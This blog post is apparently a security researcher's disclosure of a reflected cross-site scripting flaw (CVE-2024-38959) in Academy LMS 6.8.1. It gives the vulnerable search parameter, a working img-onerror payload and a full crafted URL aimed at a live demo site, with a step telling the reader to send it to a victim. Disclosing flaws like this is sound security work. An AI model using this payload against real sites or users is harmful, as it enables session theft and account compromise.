Reflected Cross-Site Scripting on Academy LMS — Learning Management System Product. — (CVE-2024–38959)

Geet madan
1 min readJul 9, 2024

--

Dear Folks,

Hi, I am Geet Madan, an Independent Security Researcher.

This blog is about how I found the Cross-Site Scripting in Academy LMS version — 6.8.1, which allows the attacker to perform a successful cross-site scripting Attack via the string parameter of this product app.

Affected Product and Its Version: Academy LMS — Learning Management System 6.8.1

CVE Assigned on this Vulnerability: CVE-2024–38959

Impact of this Vulnerability:

An attacker can use this cross-site scripting vulnerability to perform the below attacks.

such as:

- Stealing the victim user session cookies.

- Deface the website by changing the website content.

- Stealing the user’s login credentials.

- Can perform the keylogging attack.

Demo Subdomain I used: https://demo.creativeitem.com/

Detailed explanation of how I found this Vulnerability.

Step 01: First open this URL on the browser: https://demo.creativeitem.com/, This application uses the Academy LMS version 6.8.1.

Step 02: Embed this path on their website : /academy/course_bundles/search/query?string=”><img+src=x+onerror=alert(1)>geetmadan

For example:

If the target website is — https://demo.creativeitem.com/

Then after embedding the vulnerable path with the payload, it will look like this.

Final Crafted URL: https://demo.creativeitem.com/academy/course_bundles/search/query?string="><img+src=x+onerror=alert(1)>geetmadan

4) Just send this URL to the victim person.

5) The payload will get successfully executed in their environment.

- Hence it leads to finding the successful Cross Site Scripting vulnerability on this Academy LMS 6.8.1.

Author of this CVE:

Geet Madan.

Linkedin Profile: https://www.linkedin.com/in/geet-madan/

Thanks for Reading!! :)

--

--